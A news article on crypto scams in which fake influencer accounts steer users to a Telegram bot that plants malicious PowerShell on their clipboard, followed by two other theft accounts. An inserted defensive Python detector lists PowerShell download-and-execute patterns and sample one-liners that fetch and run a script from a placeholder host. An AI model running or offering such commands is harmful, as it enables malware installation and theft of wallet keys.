A new wave of crypto scams has emerged, with attackers using fake X accounts to impersonate popular influencers and lure unsuspecting users into fraudulent Telegram groups.
Users are then manipulated into installing malware that compromises crypto wallet data.
Scammers Moving Beyond Simple Phishing Scams
According to blockchain security firm Scam Sniffer, the scammers comment on legitimate posts, enticing users with offers of exclusive investment insights and “alpha” tips. Once individuals join these Telegram groups, they are immediately prompted to undergo a verification process via a bot called OfficiaISafeguardBot.
The bot creates a false sense of urgency and pushes users to quickly complete the verification. However, this seemingly harmless step is a trap – when the user completes the verification, the bot injects malicious PowerShell code into the user’s clipboard. When executed, the code downloads malware designed to compromise the system and steal sensitive data, including crypto wallet information.
Scam Sniffer said that the malware has been flagged by VirusTotal as harmful, and previous instances of similar attacks have resulted in private key theft, leading to significant financial losses.
“This represents a new evolution in crypto scams – moving beyond simple phishing to combine social engineering with malware. Stay vigilant and share this to protect others.”
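The clipboard step described above can be checked defensively before anything copied from a "verification" page or bot is pasted into a terminal or Run dialog. The following Python detector is an added example, not code from Scam Sniffer or the article; the indicator patterns, function names and sample strings (using the reserved `example.invalid` domain) are assumptions constructed for illustration.

```python
import base64
import re

# Heuristic indicators of a PowerShell download-and-run one-liner.
# These patterns are assumptions for this example, not taken from the article.
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "powershell_invocation": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": ENCODED_ARG,
    "download": re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|start-bitstransfer)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def expand_encoded(text):
    """Append the decoded form of any -EncodedCommand payload (base64 of UTF-16LE)."""
    decoded = []
    for blob in ENCODED_ARG.findall(text):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:  # covers invalid base64 and invalid UTF-16
            continue
    return "\n".join([text] + decoded)

def inspect_clipboard_text(text):
    """Return matched indicators and whether the text should be blocked."""
    full = expand_encoded(text)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(full))
    fetches = "download" in hits and "remote_url" in hits
    runs = "powershell_invocation" in hits or "in_memory_exec" in hits
    return {"block": fetches and runs, "indicators": hits}

# Constructed sample clipboard contents (not captured from the real campaign).
_inner = "iex (irm https://example.invalid/v)"
SAMPLES = {
    "plain": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.ps1)"',
    "encoded": "powershell -enc " + base64.b64encode(_inner.encode("utf-16-le")).decode(),
    "benign_command": "Get-ChildItem C:\\Users",
    "benign_link": "Join the group: https://t.me/example_group",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, inspect_clipboard_text(text))
```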
Rampant Scams
Last month, Casa CEO Nick Neuman shared a harrowing tale of a phishing scam that targeted him. In a post on X, Neuman described a call he received from a scammer pretending to be a Coinbase support agent. The scammer claimed that Neuman’s password change request had been canceled and encouraged him to click on a link in a suspicious email.
When Neuman started questioning the scammer, they dropped the act and revealed the operation’s true nature. The scammer bragged about having recently stolen $35,000 from a victim and made it clear that the scam targets only rich crypto investors.
More recently, a crypto user under the pseudonym “LeftsideEmiri” reported losing $300,000 due to a social engineering attack. According to the user, the attack began when they received a message containing a link to a KakaoTalk conversation, which was supposedly for a partnership meeting. Although the link seemed broken, the user clicked on it, believing it to be harmless.
In hindsight, they suspect that clicking the link triggered the installation of malware, which compromised their Ethereum and Solana wallets, along with several other wallets. The user made it clear that they had not approved or signed any transactions, indicating that the attack was covert and took advantage of social engineering techniques to steal funds.